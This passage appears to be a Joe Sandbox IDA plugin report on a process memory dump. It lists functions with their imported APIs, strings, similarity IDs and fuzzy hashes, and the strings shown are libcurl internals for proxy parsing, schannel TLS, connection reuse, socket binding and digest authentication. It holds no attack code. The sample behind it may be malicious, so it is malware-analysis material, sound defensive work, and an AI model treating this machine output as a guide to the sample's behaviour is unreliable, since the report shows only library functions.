free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF7F8D1EE2B), ref: 00007FF7F8D1EAF9

Strings

socks5h, xrefs: 00007FF7F8D1E610
socks4, xrefs: 00007FF7F8D1E678
socks, xrefs: 00007FF7F8D1E692
http:, xrefs: 00007FF7F8D1E6A9
%25, xrefs: 00007FF7F8D1E7AA
Unsupported proxy scheme for '%s', xrefs: 00007FF7F8D1E6BE
socks5, xrefs: 00007FF7F8D1E630
socks4a, xrefs: 00007FF7F8D1E654
://, xrefs: 00007FF7F8D1E5BC
https, xrefs: 00007FF7F8D1E5F0
No valid port number in proxy string (%s), xrefs: 00007FF7F8D1E88B
Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support., xrefs: 00007FF7F8D1E6ED
Invalid IPv6 address format, xrefs: 00007FF7F8D1E811
Please URL encode %% as %%25, see RFC 6874., xrefs: 00007FF7F8D1E7BE

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$strchr$isxdigit$isalphastrncmpstrtol
String ID: %25$://$Invalid IPv6 address format$No valid port number in proxy string (%s)$Please URL encode %% as %%25, see RFC 6874.$Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$http:$https$socks$socks4$socks4a$socks5$socks5h
API String ID: 2964755728-741215929
Opcode ID: 01894c9e9f79090ad96b47a2a91c4d7f481438575ce4b6f84746349730f78ecc
Instruction ID: f1d2f539cb3b27a175ef41b194c9591f9f94dc428d03ece8f6c8273db1bcf3b6
Opcode Fuzzy Hash: 01894c9e9f79090ad96b47a2a91c4d7f481438575ce4b6f84746349730f78ecc
Instruction Fuzzy Hash: 92F18461A0CA5285FB11AB71E8542B9E790BF5CBA4FC84531CE6D476C1DF3CE448E3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3DB7C Relevance: 52.9, APIs: 8, Strings: 22, Instructions: 398libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F8D3DC5F
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F8D3DC6F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3DE6D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3DF53

Strings

schannel: initial InitializeSecurityContext failed: %s, xrefs: 00007FF7F8D3E14C
ntdll, xrefs: 00007FF7F8D3DC58
Unrecognized parameter passed via CURLOPT_SSLVERSION, xrefs: 00007FF7F8D3DF62
http/1.1, xrefs: 00007FF7F8D3DFCA
schannel: incremented credential handle refcount = %d, xrefs: 00007FF7F8D3DD38
wine_get_version, xrefs: 00007FF7F8D3DC68
schannel: unable to allocate memory, xrefs: 00007FF7F8D3DE7C
schannel: SSL/TLS connection with %s port %hu (step 1/3), xrefs: 00007FF7F8D3DC13
Microsoft Unified Security Protocol Provider, xrefs: 00007FF7F8D3DEDF
schannel: checking server certificate revocation, xrefs: 00007FF7F8D3DDCA
schannel: sending initial handshake data: sending %lu bytes..., xrefs: 00007FF7F8D3E18A
schannel: disabled server certificate revocation checks, xrefs: 00007FF7F8D3DDDD
schannel: AcquireCredentialsHandle failed: %s, xrefs: 00007FF7F8D3DF29
schannel: re-using existing credential handle, xrefs: 00007FF7F8D3DD19
schannel: verifyhost setting prevents Schannel from comparing the supplied target name with the subject names in server certificates., xrefs: 00007FF7F8D3DDF6
schannel: using IP address, SNI is not supported by OS., xrefs: 00007FF7F8D3DFA0
schannel: SNI or certificate check failed: %s, xrefs: 00007FF7F8D3DF19, 00007FF7F8D3E13C
schannel: failed to send initial handshake data: sent %zd of %lu bytes, xrefs: 00007FF7F8D3E22A
http/1.1, xrefs: 00007FF7F8D3DFB9
schannel: ALPN, offering %s, xrefs: 00007FF7F8D3DFD5
schannel: sent initial handshake data: sent %zd bytes, xrefs: 00007FF7F8D3E1F2
schannel: WinSSL version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 00007FF7F8D3DC3F

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: AddressHandleModuleProcfreemalloc
String ID: Microsoft Unified Security Protocol Provider$Unrecognized parameter passed via CURLOPT_SSLVERSION$http/1.1$http/1.1$ntdll$schannel: ALPN, offering %s$schannel: AcquireCredentialsHandle failed: %s$schannel: SNI or certificate check failed: %s$schannel: SSL/TLS connection with %s port %hu (step 1/3)$schannel: WinSSL version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: checking server certificate revocation$schannel: disabled server certificate revocation checks$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: incremented credential handle refcount = %d$schannel: initial InitializeSecurityContext failed: %s$schannel: re-using existing credential handle$schannel: sending initial handshake data: sending %lu bytes...$schannel: sent initial handshake data: sent %zd bytes$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$schannel: verifyhost setting prevents Schannel from comparing the supplied target name with the subject names in server certificates.$wine_get_version
API String ID: 2353189633-3298331532
Opcode ID: 6a543bd661bb61a39d843e8353e64689141afbc20a07f022812279e442afd386
Instruction ID: 567bbfce03cd23219046380da28303305978116a48e0e48722d823cfa4463eb5
Opcode Fuzzy Hash: 6a543bd661bb61a39d843e8353e64689141afbc20a07f022812279e442afd386
Instruction Fuzzy Hash: 8212D272A08B8185EB10AF61E4443A9F7A4FF48794F800136DA6D5B7D5DF3CE408E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D17500 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 229networkstringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D175CA
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D17601
inet_pton.WS2_32 ref: 00007FF7F8D176DE
htons.WS2_32 ref: 00007FF7F8D176F1
inet_pton.WS2_32 ref: 00007FF7F8D1771F
htons.WS2_32 ref: 00007FF7F8D17773
bind.WS2_32 ref: 00007FF7F8D17794
htons.WS2_32 ref: 00007FF7F8D177CF
bind.WS2_32 ref: 00007FF7F8D177E5
getsockname.WS2_32 ref: 00007FF7F8D17811
WSAGetLastError.WS2_32 ref: 00007FF7F8D1781B
WSAGetLastError.WS2_32 ref: 00007FF7F8D1784D

Strings

Couldn't bind to interface '%s', xrefs: 00007FF7F8D175D8
Local port: %hu, xrefs: 00007FF7F8D17872
Name '%s' family %i resolved to '%s' family %i, xrefs: 00007FF7F8D17698
host!, xrefs: 00007FF7F8D175F7
Bind to local port %hu failed, trying next, xrefs: 00007FF7F8D177B9
getsockname() failed with errno %d: %s, xrefs: 00007FF7F8D17833
if!, xrefs: 00007FF7F8D175C0
bind failed with errno %d: %s, xrefs: 00007FF7F8D17865
Couldn't bind to '%s', xrefs: 00007FF7F8D1772E

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: htons$ErrorLastbindinet_ptonstrncmp$getsockname
String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$host!$if!
API String ID: 3536004664-3110688763
Opcode ID: c7df2ba5d5bfe18d158561e9dc2ed3a9453250391aee9920f7eac1ea2907e431
Instruction ID: a9bd2dc2cf14f2f05316f40720a6525d8281ffcd0a11476df036b4ead886b742
Opcode Fuzzy Hash: c7df2ba5d5bfe18d158561e9dc2ed3a9453250391aee9920f7eac1ea2907e431
Instruction Fuzzy Hash: C9A1C122B19A5285FB14EB25D4406BAE760BF4C794F841031E92E47AE9DF7CD10CE768

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D20374 Relevance: 33.6, APIs: 11, Strings: 11, Instructions: 640stringCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D20456
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D2047A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D204A3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D204CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D204F8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D2050D
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D20522

Part of subcall function 00007FF7F8D1D644: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FF7F8D20410,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7F8D1D677

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D20637
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F8D20668
strchr.LIBVCRUNTIME ref: 00007FF7F8D206A6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D20C32

Strings

Re-using existing connection! (#%ld) with %s %s, xrefs: 00007FF7F8D20C90
NTLM picked AND auth done set, clear picked!, xrefs: 00007FF7F8D20DAF
%s://%s, xrefs: 00007FF7F8D205FD
No more connections allowed to host: %d, xrefs: 00007FF7F8D20D2A
Found connection %ld, with requests in the pipe (%zu), xrefs: 00007FF7F8D20BC5
No connections available in cache, xrefs: 00007FF7F8D20D75
NTLM-proxy picked AND auth done set, clear picked!, xrefs: 00007FF7F8D20DDE
proxy, xrefs: 00007FF7F8D20C72
host, xrefs: 00007FF7F8D20C7D
No connections available., xrefs: 00007FF7F8D20E50
We can reuse, but we want a new connection anyway, xrefs: 00007FF7F8D20BF8

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$malloc$callocstrchrtolower
String ID: %s://%s$Found connection %ld, with requests in the pipe (%zu)$NTLM picked AND auth done set, clear picked!$NTLM-proxy picked AND auth done set, clear picked!$No connections available in cache$No connections available.$No more connections allowed to host: %d$Re-using existing connection! (#%ld) with %s %s$We can reuse, but we want a new connection anyway$host$proxy
API String ID: 2860663014-3132639422
Opcode ID: 07b9314ba3f292ae291e9615deaaccedbf15a86c7b7902e6b4c9c834b86602e4
Instruction ID: 16b317b5e7b8142592e804009a5b1290ad86f75891ff7115d29d3f8c15372533
Opcode Fuzzy Hash: 07b9314ba3f292ae291e9615deaaccedbf15a86c7b7902e6b4c9c834b86602e4
Instruction Fuzzy Hash: 90628F62609B8286EB58EB21A4503B9E7A0FF49B84F844131CFAD077D1DF3CE459D398

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D40E90 Relevance: 28.9, APIs: 16, Strings: 3, Instructions: 439COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D40F3A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D4100D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41027
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41041

Strings

Digest, xrefs: 00007FF7F8D40E95
digest_sspi: MakeSignature failed, error 0x%08lx, xrefs: 00007FF7F8D4110B
WDigest, xrefs: 00007FF7F8D41289

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$malloc
String ID: Digest$WDigest$digest_sspi: MakeSignature failed, error 0x%08lx
API String ID: 2190258309-3931579343
Opcode ID: 0a62f6e9b3d73c8dc0a02518f2e8254e1d63863cd834b3974f7d50c7c5863ee5
Instruction ID: ea71d6cbfa6a7755b76773415827aa47aff3f23d7b5351f81c9b80645aeb7bc4
Opcode Fuzzy Hash: 0a62f6e9b3d73c8dc0a02518f2e8254e1d63863cd834b3974f7d50c7c5863ee5
Instruction Fuzzy Hash: 0A123D35A09B8686EB24AF62F850269F7A4FF4CB84F880075DE5E47794DF3CE4089794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D11D04 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 402COMMON

Download Yara Rule

APIs

isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D11D8C
isalpha.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D11DA2
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D11F04

Strings

GMT, xrefs: 00007FF7F8D11EB0
%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz], xrefs: 00007FF7F8D11DBD
%02d:%02d:%02d%n, xrefs: 00007FF7F8D11F3C
%02d:%02d%n, xrefs: 00007FF7F8D11F76

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isalnumisalphaisdigit
String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$GMT
API String ID: 1074301303-988243589
Opcode ID: 168dd7722daf38918aebbc7b36df1de1bd19216b4c5df98a771307de2e75f261
Instruction ID: a83905fefeddf91a936c6bf829a010724de1905189eec8cb8278cb3d53e36d91
Opcode Fuzzy Hash: 168dd7722daf38918aebbc7b36df1de1bd19216b4c5df98a771307de2e75f261
Instruction Fuzzy Hash: A6F1D532F08A028AFB14EB7494102BCF6A5AF0C778F905236DE3D576D4DF3999499394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12C90 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 85stringwindowCOMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CAA
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CB2
__sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CC9
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CD5
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CE7
FormatMessageA.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F8D12D23
__swprintf_l.LIBCMT ref: 00007FF7F8D12D43
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D91
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D9C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DA5
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DB1

Strings

Unknown error %d (%#x), xrefs: 00007FF7F8D12D34

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$FormatMessage__swprintf_l__sys_nerrstrerrorstrncpy
String ID: Unknown error %d (%#x)
API String ID: 3027987245-2414550090
Opcode ID: a39b553896adf3e026e5dbb80f190267936aadc1b2c147f1f8515ef7b5e6914a
Instruction ID: 97c4dcd6aa1525c9c1f70aad86781d398d48ba77724f13c36f11b2886099dded
Opcode Fuzzy Hash: a39b553896adf3e026e5dbb80f190267936aadc1b2c147f1f8515ef7b5e6914a
Instruction Fuzzy Hash: F631A421A0CA4382FB14BF61E404379E751AF9CBA4F880034C96E47BD5CF7DE448A7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1CA68 Relevance: 18.1, Strings: 14, Instructions: 558COMMON

Download Yara Rule

Strings

Server doesn't support multi-use yet, wait, xrefs: 00007FF7F8D1CBD2
Could multiplex, but not asked to!, xrefs: 00007FF7F8D1CC39
Could pipeline, but not asked to!, xrefs: 00007FF7F8D1CC16
Server doesn't support multi-use (yet), xrefs: 00007FF7F8D1CBE9
can multiplex, xrefs: 00007FF7F8D1CB75
Found pending candidate for reuse and CURLOPT_PIPEWAIT is set, xrefs: 00007FF7F8D1D358
Pipe is full, skip (%zu), xrefs: 00007FF7F8D1D25F
Multiplexed connection found!, xrefs: 00007FF7F8D1D334
can pipeline, xrefs: 00007FF7F8D1CB69
Found bundle for host %s: %p [%s], xrefs: 00007FF7F8D1CBAB
Connection #%ld isn't open enough, can't reuse, xrefs: 00007FF7F8D1D309
Connection #%ld is still name resolving, can't reuse, xrefs: 00007FF7F8D1CD1B
Penalized, skip, xrefs: 00007FF7F8D1D282
serially, xrefs: 00007FF7F8D1CB7C

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID: Connection #%ld is still name resolving, can't reuse$Connection #%ld isn't open enough, can't reuse$Could multiplex, but not asked to!$Could pipeline, but not asked to!$Found bundle for host %s: %p [%s]$Found pending candidate for reuse and CURLOPT_PIPEWAIT is set$Multiplexed connection found!$Penalized, skip$Pipe is full, skip (%zu)$Server doesn't support multi-use (yet)$Server doesn't support multi-use yet, wait$can multiplex$can pipeline$serially
API String ID: 0-2820645423
Opcode ID: a80fd8af6b6aa6c080124499bc86101e556480d1348d419bb2a9617e7442b105
Instruction ID: 553b37c9ebad77d9c6120d92d5d648ae655c87bf5758f48a1a2040b5df242caf
Opcode Fuzzy Hash: a80fd8af6b6aa6c080124499bc86101e556480d1348d419bb2a9617e7442b105
Instruction Fuzzy Hash: A742D721A0DEC240FB65AF3585407B9E7A0BF48B94F984035CE6D472D5DF2CE859E3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D323A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D323E6

Strings

bind() failed; %s, xrefs: 00007FF7F8D32518

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: calloc
String ID: bind() failed; %s
API String ID: 2635317215-1141498939
Opcode ID: f54377c56f305a470a9c82b949510dc6559042ea7cb0f78dc0305c528607ebc3
Instruction ID: fe8e814aa396abe6225120ecb28856bfdc525f5c4be03250bc9d0f4e8f0cf364
Opcode Fuzzy Hash: f54377c56f305a470a9c82b949510dc6559042ea7cb0f78dc0305c528607ebc3
Instruction Fuzzy Hash: 46416C22A08B9686EB14EB21F84436AF7A4FF5CB85F854035CE6D47390DF3CE449A354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3FD00 Relevance: 6.0, APIs: 4, Instructions: 34encryptionCOMMON

Download Yara Rule

APIs

CryptGetHashParam.API-MS-WIN-SECURITY-CRYPTOAPI-L1-1-0 ref: 00007FF7F8D3FD29
CryptGetHashParam.API-MS-WIN-SECURITY-CRYPTOAPI-L1-1-0 ref: 00007FF7F8D3FD4C
CryptDestroyHash.API-MS-WIN-SECURITY-CRYPTOAPI-L1-1-0 ref: 00007FF7F8D3FD5B
CryptReleaseContext.API-MS-WIN-SECURITY-CRYPTOAPI-L1-1-0 ref: 00007FF7F8D3FD6B

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: Crypt$Hash$Param$ContextDestroyRelease
String ID:
API String ID: 2110207923-0
Opcode ID: 1daa6c712a4ac1c6b980b5a814349c12a7a0815788efa1b048e4d341e6ff901d
Instruction ID: 6455d187c86efb6cba5dcb5727b8eec32425ca690677d66b4b56f2a0a9c4d26f
Opcode Fuzzy Hash: 1daa6c712a4ac1c6b980b5a814349c12a7a0815788efa1b048e4d341e6ff901d
Instruction Fuzzy Hash: 18015A3AA1964486EB00DF61E444379F330EF98F95F988431DA1D076A4CF3CD848DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3FCA0 Relevance: 3.0, APIs: 2, Instructions: 20encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.API-MS-WIN-SECURITY-CRYPTOAPI-L1-1-0 ref: 00007FF7F8D3FCBC
CryptCreateHash.API-MS-WIN-SECURITY-CRYPTOAPI-L1-1-0 ref: 00007FF7F8D3FCDD

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: Crypt$AcquireContextCreateHash
String ID:
API String ID: 1914063823-0
Opcode ID: 33cfcfe148ed8946f04674a79b7e45eff7db507fe921e0bc59df170c017b5a6c
Instruction ID: 545684ba5b9327d6587933f6be71d6f549bc938a26294a3a7a5234bc2949db6e
Opcode Fuzzy Hash: 33cfcfe148ed8946f04674a79b7e45eff7db507fe921e0bc59df170c017b5a6c
Instruction Fuzzy Hash: 48E0D821B1855642F7209B71E401B16E350FF98748F888030CE4C0BA54CF3CC055CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D48E54 Relevance: .1, Instructions: 111COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc21618b906d9805955336db46d658a5edf352f7718a27ab725e675ebd82f1c
